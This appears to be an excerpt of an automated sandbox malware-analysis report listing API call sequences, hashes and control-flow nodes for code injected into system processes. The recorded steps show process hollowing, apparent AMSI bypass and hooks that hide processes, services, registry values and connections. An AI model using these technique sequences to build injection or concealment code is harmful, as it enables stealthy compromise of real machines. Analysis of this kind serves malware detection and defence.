                                                          • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                          • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                                          • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                          • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

                                                          Control-flow Graph for 140002434-14000292d (node and edge list omitted): call 1400020cc, CreateProcessW, VirtualAllocEx, WriteProcessMemory, VirtualProtectEx, VirtualAlloc, GetThreadContext/Wow64GetThreadContext, WriteProcessMemory, SetThreadContext/Wow64SetThreadContext, ResumeThread, call 140002930; failure path OpenProcess, TerminateProcess
                                                          Similarity
                                                          • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                          • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                          • API String ID: 1036100660-1371749706
                                                          • Opcode ID: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                                          • Instruction ID: fe181f3da7762b1cf8407140d3e190fa013b7b60483d6e0a4c0671c43d788581
                                                          • Opcode Fuzzy Hash: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                                          • Instruction Fuzzy Hash: ACD16FB270568187EB65CF63F84479AB7A0F788BC4F044025EB8A47BA4DF78D599CB04

                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                          • Instruction ID: cbe0a9e96035c6652df35f1bebe582e7c0167c489293dce8c24ece8bd57d0938
                                                          • Opcode Fuzzy Hash: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                          • Instruction Fuzzy Hash: C35128B2604B8486EB56DF62F4483AA77A1F78CBD5F444124EB4A07B79DF38C555C700
                                                          Similarity
                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                          • String ID:
                                                          • API String ID: 4184240511-0
                                                          • Opcode ID: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                                          • Instruction ID: 0e6833bd3eeca7de3220de005558475a35c56d9be5ad7e086776b2a4e8a7938b
                                                          • Opcode Fuzzy Hash: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                                          • Instruction Fuzzy Hash: 894147B2700A859AE711CF6AE8843DD73B1FB89B89F445225FF0A43A69DF38C159C304

                                                          Similarity
                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 3993315683-3572789727
                                                          • Opcode ID: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
                                                          • Instruction ID: 5ebcb72c0a3035c4b67d8f00751cefd31434bbf5df89411654f5c91112f76ea3
                                                          • Opcode Fuzzy Hash: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
                                                          • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                          • Instruction ID: 42b997484051ce9e6daf6bc3104cf1544be02307d9272190f1dec121864cc25c
                                                          • Opcode Fuzzy Hash: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                          • Instruction Fuzzy Hash: E1412AB2214B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                          Similarity
                                                          • API ID: Delete$CloseEnumOpen
                                                          • String ID: SOFTWARE\$nya-config
                                                          • API String ID: 3013565938-2636501262
                                                          • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                          • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                                          • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                          • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                                          • Instruction ID: ae713076178dcd36b59d2bede7e3524c8608a398496d325058d9822cf47af1f0
                                                          • Opcode Fuzzy Hash: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                                          • Instruction Fuzzy Hash: D80102B2610A908AE705EF67B90438977A1F78CFC5F4A4025FB9953739DE38D491C744
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: ntdll.dll
                                                          • API String ID: 1646373207-2227199552
                                                          • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                          • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                                          • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                          • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                          • Instruction ID: 1511527892a3fb8eded8389ff9e17f75ca8e9e74a60c21ae91e61c536c9c2234
                                                          • Opcode Fuzzy Hash: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                          • Instruction Fuzzy Hash: 39E039F170160086E705DB63E80438936E1EB8CB81F858024DA1907371DF7D84D98750
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                          • Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
                                                          • Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                          • Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24

                                                          Execution Graph

                                                          Execution Coverage: 1.4%
                                                          Dynamic/Decrypted Code Coverage: 100%
                                                          Signature Coverage: 2.5%
                                                          Total number of Nodes: 118
                                                          Total number of Limit Nodes: 19
                                                          execution_graph 22465 225dc6441f9 22468 225dc644146 _invalid_parameter_noinfo 22465->22468 22466 225dc6441b0 22467 225dc644196 VirtualQuery 22467->22466 22467->22468 22468->22466 22468->22467 22469 225dc6441ca VirtualAlloc 22468->22469 22469->22466 22470 225dc6441fb GetLastError 22469->22470 22470->22468 22472 225dc641e3c LoadLibraryA GetProcAddress 22473 225dc641e62 SleepEx 22472->22473 22474 225dc641e6f 22472->22474 22473->22473 22475 225dc67d220 22480 225dc67d231 __std_exception_copy 22475->22480 22476 225dc67d282 22483 225dc67d1f4 13 API calls __std_exception_copy 22476->22483 22477 225dc67d266 HeapAlloc 22478 225dc67d280 22477->22478 22477->22480 22480->22476 22480->22477 22482 225dc67b470 EnterCriticalSection LeaveCriticalSection __std_exception_copy 22480->22482 22482->22480 22483->22478 22484 225dc641bc4 22491 225dc641724 GetProcessHeap HeapAlloc 22484->22491 22486 225dc641bda SleepEx 22487 225dc641724 50 API calls 22486->22487 22489 225dc641bd3 22487->22489 22489->22486 22490 225dc64159c StrCmpIW StrCmpW 22489->22490 22542 225dc6419b0 12 API calls 22489->22542 22490->22489 22543 225dc641264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22491->22543 22493 225dc64174c 22544 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22493->22544 22495 225dc641754 22545 225dc641264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22495->22545 22497 225dc64175d 22546 225dc641264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22497->22546 22499 225dc641766 22547 225dc641264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22499->22547 22501 225dc64176f 22548 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22501->22548 22503 225dc641778 22549 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22503->22549 22505 225dc641781 22550 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22505->22550 22507 225dc64178a RegOpenKeyExW 22508 225dc6417bc RegOpenKeyExW 
22507->22508 22509 225dc6419a2 22507->22509 22510 225dc6417fb RegOpenKeyExW 22508->22510 22511 225dc6417e5 22508->22511 22509->22489 22513 225dc641836 RegOpenKeyExW 22510->22513 22514 225dc64181f 22510->22514 22557 225dc6412b8 16 API calls 22511->22557 22516 225dc64185a 22513->22516 22517 225dc641871 RegOpenKeyExW 22513->22517 22551 225dc64104c RegQueryInfoKeyW 22514->22551 22558 225dc6412b8 16 API calls 22516->22558 22521 225dc6418ac RegOpenKeyExW 22517->22521 22522 225dc641895 22517->22522 22518 225dc6417f1 RegCloseKey 22518->22510 22525 225dc6418e7 RegOpenKeyExW 22521->22525 22526 225dc6418d0 22521->22526 22559 225dc6412b8 16 API calls 22522->22559 22523 225dc641867 RegCloseKey 22523->22517 22529 225dc64190b 22525->22529 22530 225dc641922 RegOpenKeyExW 22525->22530 22560 225dc6412b8 16 API calls 22526->22560 22527 225dc6418a2 RegCloseKey 22527->22521 22531 225dc64104c 6 API calls 22529->22531 22532 225dc641946 22530->22532 22533 225dc64195d RegOpenKeyExW 22530->22533 22535 225dc641918 RegCloseKey 22531->22535 22536 225dc64104c 6 API calls 22532->22536 22537 225dc641998 RegCloseKey 22533->22537 22538 225dc641981 22533->22538 22534 225dc6418dd RegCloseKey 22534->22525 22535->22530 22539 225dc641953 RegCloseKey 22536->22539 22537->22509 22540 225dc64104c 6 API calls 22538->22540 22539->22533 22541 225dc64198e RegCloseKey 22540->22541 22541->22537 22543->22493 22544->22495 22545->22497 22546->22499 22547->22501 22548->22503 22549->22505 22550->22507 22552 225dc6411b5 RegCloseKey 22551->22552 22553 225dc6410bf 22551->22553 22552->22513 22553->22552 22554 225dc6410cf RegEnumValueW 22553->22554 22555 225dc641125 22554->22555 22555->22552 22555->22554 22556 225dc64114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 22555->22556 22556->22555 22557->22518 22558->22523 22559->22527 22560->22534 22561 225dc645c8d 22563 225dc645c94 22561->22563 22562 225dc645cfb 22563->22562 22564 225dc645d77 VirtualProtect 22563->22564 22565 225dc645db1 22564->22565 22566 225dc645da3 
GetLastError 22564->22566 22566->22565 22567 225dc64f370 VirtualProtect 22568 225dc646430 22569 225dc64643d 22568->22569 22570 225dc646449 22569->22570 22577 225dc64655a 22569->22577 22571 225dc64647e 22570->22571 22572 225dc6464cd 22570->22572 22573 225dc6464a6 SetThreadContext 22571->22573 22573->22572 22574 225dc646581 VirtualProtect FlushInstructionCache 22574->22577 22575 225dc64663e 22576 225dc64665e 22575->22576 22586 225dc644b20 VirtualFree 22575->22586 22587 225dc645530 GetCurrentProcess 22576->22587 22577->22574 22577->22575 22580 225dc646663 22581 225dc6466b7 22580->22581 22582 225dc646677 ResumeThread 22580->22582 22591 225dc648070 8 API calls 2 library calls 22581->22591 22583 225dc6466ab 22582->22583 22583->22580 22585 225dc6466ff 22586->22576 22588 225dc64554c 22587->22588 22589 225dc645562 VirtualProtect FlushInstructionCache 22588->22589 22590 225dc645593 22588->22590 22589->22588 22590->22580 22591->22585 22592 225dc642c80 TlsGetValue TlsGetValue TlsGetValue 22593 225dc642cd9 22592->22593 22594 225dc642d51 NtEnumerateValueKey 22592->22594 22593->22594 22602 225dc642ce1 22593->22602 22595 225dc642d86 22594->22595 22596 225dc642d4c 22594->22596 22595->22596 22598 225dc642e06 TlsSetValue TlsSetValue TlsSetValue 22595->22598 22599 225dc642da0 NtEnumerateValueKey 22595->22599 22601 225dc643f88 StrCmpNIW 22595->22601 22597 225dc642d2d NtEnumerateValueKey 22597->22596 22597->22602 22598->22596 22599->22595 22601->22595 22602->22596 22602->22597 22602->22598 22603 225dc643f88 22602->22603 22604 225dc643f95 StrCmpNIW 22603->22604 22605 225dc643faa 22603->22605 22604->22605 22605->22602

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value$Enumerate
                                                          • String ID:
                                                          • API String ID: 3520290360-0
                                                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction ID: a0c12a1f98a87ea879fde35af57b915faa0522e2d4c8012c639be39e88e0e21e
                                                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction Fuzzy Hash: 8C51933961CE61A7E765CF9EE448A5AB3A0F788B86F60C159DE4B43B54DF38C845CB00

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 223 225dc641e3c-225dc641e60 LoadLibraryA GetProcAddress 224 225dc641e62-225dc641e6d SleepEx 223->224 225 225dc641e6f-225dc641e73 223->225 224->224
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: b943b4d4fec2722a97f31a6593bd222e515073a37d9d17746b47865a0752c427
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: 02D0671C625E24F6EE186B9DE89C7543261AB68B03FE49455C50B012A0EE3C8559C340

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: c163acaebe60ea4311e68be09e509954e4c92294b53dd205c1ff3ab862208a51
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: 4771133A724E61A6EB109FA9E85869D3374FB88B8AF909112DD4E57B68EF34C444C740

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: f29ca842126068601b63f5b890003817ffb932e00ebe5f9bb7d400ae7e1bf134
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: 96519D6C568E6AB6EB01EFECEC5C7D93720A74474BFA0C593940A52175EF3C825AC340

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                          • API String ID: 740688525-1880043860
                                                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction ID: 4da6f4d7dae9b34e047b1af2eeeb94523d213e1203e1e1d78f3bf8175cea8fad
                                                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction Fuzzy Hash: 2751C63971CF24B1EE149BEA98083A53290BB48BB2F588725EE3E477C0EF38D445C641

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 151 225dc646270-225dc646297 152 225dc646299-225dc6462a8 151->152 153 225dc6462ab-225dc6462b6 GetCurrentThreadId 151->153 152->153 154 225dc6462b8-225dc6462bd 153->154 155 225dc6462c2-225dc6462c9 153->155 156 225dc6466ef-225dc646706 call 225dc648070 154->156 157 225dc6462db-225dc6462ef 155->157 158 225dc6462cb-225dc6462d6 call 225dc6460a0 155->158 161 225dc6462fe-225dc646304 157->161 158->156 164 225dc64630a-225dc646313 161->164 165 225dc6463d5-225dc6463f6 161->165 167 225dc64635a-225dc6463cd call 225dc644c50 call 225dc644bf0 call 225dc644bb0 164->167 168 225dc646315-225dc646358 call 225dc653a40 164->168 169 225dc6463fc-225dc64641c GetThreadContext 165->169 170 225dc64655f-225dc646570 call 225dc647bff 165->170 180 225dc6463d0 167->180 168->180 173 225dc64655a 169->173 174 225dc646422-225dc646443 169->174 184 225dc646575-225dc64657b 170->184 173->170 174->173 183 225dc646449-225dc646452 174->183 180->161 186 225dc6464d2-225dc6464e3 183->186 187 225dc646454-225dc646465 183->187 188 225dc646581-225dc6465d8 VirtualProtect FlushInstructionCache 184->188 189 225dc64663e-225dc64664e 184->189 197 225dc646555 186->197 198 225dc6464e5-225dc646503 186->198 193 225dc646467-225dc64647c 187->193 194 225dc6464cd 187->194 195 225dc646609-225dc646639 call 225dc647fdc 188->195 196 225dc6465da-225dc6465e4 188->196 191 225dc64665e-225dc64666a call 225dc645530 189->191 192 225dc646650-225dc646657 189->192 213 225dc64666f-225dc646675 191->213 192->191 201 225dc646659 call 225dc644b20 192->201 193->194 203 225dc64647e-225dc6464c8 call 225dc6440b0 SetThreadContext 193->203 194->197 195->184 196->195 204 225dc6465e6-225dc646601 call 225dc644ad0 196->204 198->197 205 225dc646505-225dc646550 call 225dc644040 call 225dc647c1d 198->205 201->191 203->194 204->195 205->197 217 225dc6466b7-225dc6466d5 213->217 218 225dc646677-225dc6466b5 ResumeThread call 225dc647fdc 213->218 220 225dc6466e9 217->220 221 
225dc6466d7-225dc6466e6 217->221 218->213 220->156 221->220
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
                                                          • Instruction ID: 295b081cb87bf85b7e110addeb5a6b591f47254ecbc1534d835875b48c3d2520
                                                          • Opcode Fuzzy Hash: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
                                                          • Instruction Fuzzy Hash: 6DD1AE3A20CF9891DA70DB9AE49835A77A0F3C8B89F108156EACE47769DF3DC551CB04

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 226 225dc645810-225dc64583c 227 225dc64584d-225dc645856 226->227 228 225dc64583e-225dc645846 226->228 229 225dc645867-225dc645870 227->229 230 225dc645858-225dc645860 227->230 228->227 231 225dc645881-225dc64588a 229->231 232 225dc645872-225dc64587a 229->232 230->229 233 225dc64588c-225dc645891 231->233 234 225dc645896-225dc6458a1 GetCurrentThreadId 231->234 232->231 235 225dc645e13-225dc645e1a 233->235 236 225dc6458a3-225dc6458a8 234->236 237 225dc6458ad-225dc6458b4 234->237 236->235 238 225dc6458b6-225dc6458bc 237->238 239 225dc6458c1-225dc6458ca 237->239 238->235 240 225dc6458cc-225dc6458d1 239->240 241 225dc6458d6-225dc6458e2 239->241 240->235 242 225dc6458e4-225dc645909 241->242 243 225dc64590e-225dc645965 call 225dc645e20 * 2 241->243 242->235 248 225dc64597a-225dc645983 243->248 249 225dc645967-225dc64596e 243->249 252 225dc645995-225dc64599e 248->252 253 225dc645985-225dc645992 248->253 250 225dc645976 249->250 251 225dc645970 249->251 255 225dc6459e6-225dc6459ea 250->255 254 225dc6459f0-225dc6459f6 251->254 256 225dc6459b3-225dc6459d8 call 225dc647fa0 252->256 257 225dc6459a0-225dc6459b0 252->257 253->252 259 225dc645a25-225dc645a2b 254->259 260 225dc6459f8-225dc645a14 call 225dc644ad0 254->260 255->254 267 225dc645a6d-225dc645a82 call 225dc644400 256->267 268 225dc6459de 256->268 257->256 262 225dc645a55-225dc645a68 259->262 263 225dc645a2d-225dc645a4c call 225dc647fdc 259->263 260->259 269 225dc645a16-225dc645a1e 260->269 262->235 263->262 273 225dc645a91-225dc645a9a 267->273 274 225dc645a84-225dc645a8c 267->274 268->255 269->259 275 225dc645aac-225dc645afa call 225dc6540e0 273->275 276 225dc645a9c-225dc645aa9 273->276 274->255 279 225dc645b02-225dc645b0a 275->279 276->275 280 225dc645c17-225dc645c1f 279->280 281 225dc645b10-225dc645bfb call 225dc647b80 279->281 283 225dc645c21-225dc645c34 call 225dc644cd0 280->283 284 225dc645c63-225dc645c6b 280->284 292 225dc645bfd 281->292 
293 225dc645bff-225dc645c0e call 225dc6447a0 281->293 298 225dc645c36 283->298 299 225dc645c38-225dc645c61 283->299 285 225dc645c77-225dc645c86 284->285 286 225dc645c6d-225dc645c75 284->286 290 225dc645c88 285->290 291 225dc645c8f 285->291 286->285 289 225dc645c94-225dc645ca1 286->289 295 225dc645ca3 289->295 296 225dc645ca4-225dc645cf9 call 225dc653a40 289->296 290->291 291->289 292->280 303 225dc645c12 293->303 304 225dc645c10 293->304 295->296 305 225dc645cfb-225dc645d03 296->305 306 225dc645d08-225dc645da1 call 225dc644c50 call 225dc644bb0 VirtualProtect 296->306 298->284 299->280 303->279 304->280 311 225dc645db1-225dc645e11 306->311 312 225dc645da3-225dc645da8 GetLastError 306->312 311->235 312->311
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
